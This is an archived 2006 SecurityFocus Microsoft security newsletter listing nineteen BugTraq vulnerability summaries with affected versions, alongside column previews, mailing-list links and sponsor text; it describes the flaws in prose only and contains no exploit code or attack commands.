SecurityFocus Microsoft Newsletter #281



SecurityFocus Microsoft Newsletter #281
----------------------------------------

This Issue is Sponsored By: Cambia

Automate IT security compliance now!
FREE White Paper demonstrates how you can reduce time spent on IT policy compliance by as much as 90%, while improving your security posture. Cambia.s agentless software continuously discovers all changes to network assets, intelligently determines which changes pose a risk to security and compliance and works with administrators to fix breaches quickly.

http://a.gklmedia.com/sfmn/nl/125

------------------------------------------------------------------
I. FRONT AND CENTER
1. The big DRM mistake
2. The value of vulnerabilities
II. MICROSOFT VULNERABILITY SUMMARY
1. Microsoft Internet Explorer Java Applet Handling Denial of Service Vulnerability
2. Microsoft Visual Studio DBP and SLN Files DataProject Buffer Overflow Vulnerability
3. AVG Anti-Virus Local Insecure Permissions Vulnerability
4. Van Dyke SecureCRT and SecureFX Buffer Overflow Vulnerability
5. RaidenHTTPD Remote Script Disclosure Vulnerability
6. EMC Dantz Retrospect Backup Client Remote Denial of Service Vulnerability
7. VBulletin Profile.PHP Email Field HTML Injection Vulnerability
8. LetterMerger Local Information Disclosure Vulnerability
9. NCP Secure Client Multiple Vulnerabilities
10. NetworkActiv Web Server Remote Script Disclosure Vulnerability
11. OpenSSH Remote PAM Denial Of Service Vulnerability
12. HP System Management Homepage Unspecified Directory Traversal Vulnerability
13. Microsoft Internet Explorer IsComponentInstalled Buffer Overflow Vulnerability
14. Alt-N MDaemon IMAP Server Remote Format String Vulnerability
15. MySQL Query Logging Bypass Vulnerability
16. iCal Calendar Text Cross-Site Scripting Vulnerability
17. MTS Professional Open EMail Relay Vulnerability
18. ArGoSoft Mail Server Pro Multiple HTML Injection Vulnerabilities
19. PHPWebSite Topics.PHP SQL Injection Vulnerability
III. MICROSOFT FOCUS LIST SUMMARY
1. Administrivia: Holidays
2. Questions regarding EFS
3. programming Aeronet card for authentication and configuration in embedded XP
4. SecurityFocus Microsoft Newsletter #280
IV. UNSUBSCRIBE INSTRUCTIONS
V. SPONSOR INFORMATION

I. FRONT AND CENTER
---------------------
1. The big DRM mistake
By Scott Granneman
Digital Rights Managements hurts paying customers, destroys Fair Use rights, renders customers' investments worthless, and can always be defeated. Why are consumers and publishers being forced to use DRM?
http://www.securityfocus.com/columnists/390

2. The value of vulnerabilities
By Jason Miller
There is value in finding vulnerabilities. Yet many people believe that a vulnerability doesn't exist until it is disclosed to the public. We know that vulnerabilities need to be disclosed, but what role do vendors have to make these issues public?
http://www.securityfocus.com/columnists/391


II. MICROSOFT VULNERABILITY SUMMARY
------------------------------------
1. Microsoft Internet Explorer Java Applet Handling Denial of Service Vulnerability
BugTraq ID: 16978
Remote: Yes
Date Published: 2006-03-06
Relevant URL: http://www.securityfocus.com/bid/16978
Summary:
Microsoft Internet Explorer is affected by a denial of service vulnerability. This issue arises because the application fails to handle exceptional conditions in a proper manner. This issue only presents itself when Sun's Java runtime environment is installed and configured to be the default handler for Java applets.

An attacker may exploit this issue by enticing a user to visit a malicious site resulting in a denial of service condition in the application.

Specific version information for Microsoft Internet Explorer and the Java runtime are not currently available. This BID will be updated as further information is disclosed.

2. Microsoft Visual Studio DBP and SLN Files DataProject Buffer Overflow Vulnerability
BugTraq ID: 16953
Remote: Yes
Date Published: 2006-03-04
Relevant URL: http://www.securityfocus.com/bid/16953
Summary:
Microsoft Visual Studio is prone to a buffer-overflow vulnerability. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer.

This issue allows attackers to execute arbitrary code in the context of the user viewing a malicious file. As viewing a project file is usually considered to be a safe operation, users may have a false sense of security by attempting to inspect unknown code prior to compiling or executing it.

This vulnerability may be remotely exploited due to project files originating from untrusted sources.

Visual Studio 6 is reportedly vulnerable to this issue; other versions may also be affected.

3. AVG Anti-Virus Local Insecure Permissions Vulnerability
BugTraq ID: 16952
Remote: No
Date Published: 2006-03-04
Relevant URL: http://www.securityfocus.com/bid/16952
Summary:
AVG Anti-Virus is prone to a local insecure permissions vulnerability. This issue is due to the application incorrectly resetting the permissions on critical files during its periodic update process.

A local, unprivileged attacker can exploit this issue to replace critical driver files with malicious executables. This may facilitate a complete compromise of the affected computer.

This issue affects AVG version 7. Other versions may also be vulnerable.

4. Van Dyke SecureCRT and SecureFX Buffer Overflow Vulnerability
BugTraq ID: 16935
Remote: Yes
Date Published: 2006-03-03
Relevant URL: http://www.securityfocus.com/bid/16935
Summary:
Van Dyke SecureCRT and SecureFX are prone to a buffer overflow vulnerability when converting unicode strings. An attacker could potentially exploit this to execute arbitrary code or cause a denial of service.

SecureCRT versions 5.0.4 and earlier are affected. SecureFX versions 3.0.4 and earlier are affected.

5. RaidenHTTPD Remote Script Disclosure Vulnerability
BugTraq ID: 16934
Remote: Yes
Date Published: 2006-03-03
Relevant URL: http://www.securityfocus.com/bid/16934
Summary:
RaidenHTTPD is prone to an information disclosure vulnerability.

The source code of script files may be obtained by an attacker.

Scripts may contain sensitive information that may be used to aid in further attacks launched against the target computer.

RaidenHTTPD versions prior to 1.1.48 are vulnerable.

6. EMC Dantz Retrospect Backup Client Remote Denial of Service Vulnerability
BugTraq ID: 16933
Remote: Yes
Date Published: 2006-03-03
Relevant URL: http://www.securityfocus.com/bid/16933
Summary:
Dantz Retrospect Backup Client is prone to a remote denial of service vulnerability. An unauthenticated, remote attacker can cause the client to fail.

This issue has been addressed in Retrospect Backup Client 6.5.138 and 7.0.109; earlier versions are vulnerable. The Apple Retrospect Backup Client is reportedly not affected.

7. VBulletin Profile.PHP Email Field HTML Injection Vulnerability
BugTraq ID: 16919
Remote: Yes
Date Published: 2006-03-02
Relevant URL: http://www.securityfocus.com/bid/16919
Summary:
vBulletin is prone to an HTML-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the affected website, potentially allowing for the theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.

This issue is reported to affect vBulletin versions 3.0.12 through 3.5.3. Other versions may also be affected.

8. LetterMerger Local Information Disclosure Vulnerability
BugTraq ID: 16917
Remote: No
Date Published: 2006-03-02
Relevant URL: http://www.securityfocus.com/bid/16917
Summary:
LetterMerger is prone to a local information-disclosure vulnerability. This issue exists because the application stores data with insecure permissions in a Microsoft Access database.

LetterMerger 1.2 is vulnerable; other versions may also be affected.

9. NCP Secure Client Multiple Vulnerabilities
BugTraq ID: 16906
Remote: Yes
Date Published: 2006-03-01
Relevant URL: http://www.securityfocus.com/bid/16906
Summary:
NCP Secure Client is susceptible to multiple vulnerabilities.

The following issues have been identified:
- Firewall rules designed to allow only specific applications to access the network may be bypassed.
- Some applications are prone to local command-line-argument buffer-overflow vulnerabilities.
- The VPN client is susceptible to a remote denial-of-service vulnerability.
- The VPN client is susceptible to a local privilege-escalation vulnerability.

These issues allow local attackers to gain SYSTEM-level privileges, allowing them to completely compromise affected computers. Remote attackers may consume excessive CPU resources, denying service to legitimate users.

NCP Secure Client version 8.11 Build 146 on the Microsoft Windows platform is vulnerable to these issues; other versions may also be affected.

10. NetworkActiv Web Server Remote Script Disclosure Vulnerability
BugTraq ID: 16895
Remote: Yes
Date Published: 2006-03-01
Relevant URL: http://www.securityfocus.com/bid/16895
Summary:
NetworkActiv Web Server is prone to an information-disclosure vulnerability. An attacker may obtain the source code of script files.

Scripts may contain sensitive information that may aid in further attacks launched against the target computer.

NetworkActiv Web Server versions prior to 3.5.16 are vulnerable.

11. OpenSSH Remote PAM Denial Of Service Vulnerability
BugTraq ID: 16892
Remote: Yes
Date Published: 2006-03-01
Relevant URL: http://www.securityfocus.com/bid/16892
Summary:
OpenSSH is susceptible to a remote denial-of-service vulnerability. This issue is due to a design flaw when handling connections when configured to use OpenPAM authentication system.

This issue may be exploited by remote attackers to deny SSH service to legitimate users.

OpenSSH in conjunction with OpenPAM on FreeBSD versions 5.3 and 5.4 are affected by this issue. Other operating systems and versions may also be affected.

12. HP System Management Homepage Unspecified Directory Traversal Vulnerability
BugTraq ID: 16876
Remote: Yes
Date Published: 2006-02-28
Relevant URL: http://www.securityfocus.com/bid/16876
Summary:
HP System Management Homepage (SMH) is prone to an unspecified directory-traversal vulnerability. This issue is most likely due to a failure in the application to properly sanitize user-supplied input.

Presumably, an attacker can exploit this issue to retrieve arbitrary files in the context of the affected application. This issue may also permit the overwriting of arbitrary files.

The exact nature of this vulnerability is not currently known; this BID will be updated as further information becomes available.

This issue affects HP SMH only on the Microsoft Windows platform.

This issue is likely similar to the one described in BID 16571 (HP Systems Insight Manager Unspecified Directory Traversal Vulnerability), possibly due to code reuse among products.

13. Microsoft Internet Explorer IsComponentInstalled Buffer Overflow Vulnerability
BugTraq ID: 16870
Remote: Yes
Date Published: 2006-02-28
Relevant URL: http://www.securityfocus.com/bid/16870
Summary:
Microsoft Internet Explorer is prone to a remote buffer-overflow vulnerability in the 'IsComponentInstalled()' method. A successful exploit results in arbitrary code execution in the context of the user running the browser.

This issue was reportedly addressed in Windows 2000 SP4 and Windows XP SP1, but this has not been confirmed.

Internet Explorer 6 is vulnerable to this issue; earlier versions may also be affected.

14. Alt-N MDaemon IMAP Server Remote Format String Vulnerability
BugTraq ID: 16854
Remote: Yes
Date Published: 2006-02-27
Relevant URL: http://www.securityfocus.com/bid/16854
Summary:
Alt-N MDaemon IMAP Server is affected by a remote format-string vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input before using it in the format-specifier argument to a formatted printing function.

This vulnerability may be leveraged to consume excessive CPU resources or to crash the service. Due to the nature of this issue, remote code execution is likely possible, although this has not been confirmed.

Alt-N MDaemon 8.1.1 is reported to be vulnerable. Other versions are likely affected as well.

15. MySQL Query Logging Bypass Vulnerability
BugTraq ID: 16850
Remote: Yes
Date Published: 2006-02-27
Relevant URL: http://www.securityfocus.com/bid/16850
Summary:
MySQL is susceptible to a query-logging-bypass vulnerability. This issue is due to a discrepency between the handling of NULL bytes in input data.

This issue allows attackers to bypass the query-logging functionality of the database so they can cause malicious SQL queries to be improperly logged. This may help them hide the traces of malicious activity from administrators.

This issue affects MySQL version 5.0.18; other versions may also be affected.

16. iCal Calendar Text Cross-Site Scripting Vulnerability
BugTraq ID: 16845
Remote: Yes
Date Published: 2006-02-27
Relevant URL: http://www.securityfocus.com/bid/16845
Summary:
iCal is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

17. MTS Professional Open EMail Relay Vulnerability
BugTraq ID: 16840
Remote: Yes
Date Published: 2006-02-27
Relevant URL: http://www.securityfocus.com/bid/16840
Summary:
MTS Professional is susceptible to a remote open-email-relay vulnerability. This issue is due to the application's failure to properly verify the source of emails when configured to forward emails.

This issue allows remote attackers to use vulnerable servers to send arbitrary unsolicited bulk email. Attackers may also forge email messages that appear to originate from a trusted mail server.

18. ArGoSoft Mail Server Pro Multiple HTML Injection Vulnerabilities
BugTraq ID: 16834
Remote: Yes
Date Published: 2006-02-27
Relevant URL: http://www.securityfocus.com/bid/16834
Summary:
ArGoSoft Mail Server Pro is prone to multiple HTML-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

ArGoSoft Mail Server Pro 1.8.8.5 and prior versions are vulnerable.

19. PHPWebSite Topics.PHP SQL Injection Vulnerability
BugTraq ID: 16825
Remote: Yes
Date Published: 2006-02-25
Relevant URL: http://www.securityfocus.com/bid/16825
Summary:
phpWebSite is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.

Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. Administrivia: Holidays
http://www.securityfocus.com/archive/88/426709

2. Questions regarding EFS
http://www.securityfocus.com/archive/88/426490

3. programming Aeronet card for authentication and configuration in embedded XP
http://www.securityfocus.com/archive/88/426424

4. SecurityFocus Microsoft Newsletter #280
http://www.securityfocus.com/archive/88/426457

IV. UNSUBSCRIBE INSTRUCTIONS
-----------------------------
To unsubscribe send an e-mail message to ms-secnews-unsubscribe@xxxxxxxxxxxxxxxxx from the subscribed address. The contents of the subject or message body do not matter. You will receive a confirmation request message to which you will have to answer. Alternatively you can also visit http://www.securityfocus.com/newsletters and unsubscribe via the website.

If your email address has changed email listadmin@xxxxxxxxxxxxxxxxx and ask to be manually removed.

V. SPONSOR INFORMATION
------------------------
This Issue is Sponsored By: Cambia

Automate IT security compliance now!
FREE White Paper demonstrates how you can reduce time spent on IT policy compliance by as much as 90%, while improving your security posture. Cambia.s agentless software continuously discovers all changes to network assets, intelligently determines which changes pose a risk to security and compliance and works with administrators to fix breaches quickly.

http://a.gklmedia.com/sfmn/nl/125




---------------------------------------------------------------------------
---------------------------------------------------------------------------



Relevant Pages

  • SecurityFocus Microsoft Newsletter #131
    ... MICROSOFT VULNERABILITY SUMMARY ... Advanced Poll Remote Information Disclosure Vulnerability ... PHPNuke News Module Article.PHP SQL Injection Vulnerability ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter
    ... MICROSOFT VULNERABILITY SUMMARY ... EMC RepliStor Multiple Remote Heap Based Buffer Overflow Vulnerabilities ... SmarterTools SmarterMail Subject Field HTML Injection Vulnerability ... An attacker can exploit these issues to crash the affected application, ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #211
    ... MICROSOFT VULNERABILITY SUMMARY ... Microsoft Windows Kernel Local Denial of Service Vulnerabili... ... OCPortal Content Management System Remote File Include Vulne... ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #229
    ... Windows NTFS Alternate Data Streams ... MICROSOFT VULNERABILITY SUMMARY ... VBulletin Forumdisplay.PHP Remote Command Execution Vulnerab... ... AWStats Debug Remote Information Disclosure Vulnerability ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #237
    ... MICROSOFT VULNERABILITY SUMMARY ... JPortal Banner.PHP SQL Injection Vulnerability ... Microsoft Windows Kernel Object Management Denial Of Service... ... Microsoft Windows Message Queuing Remote Buffer Overflow Vul... ...
    (Focus-Microsoft)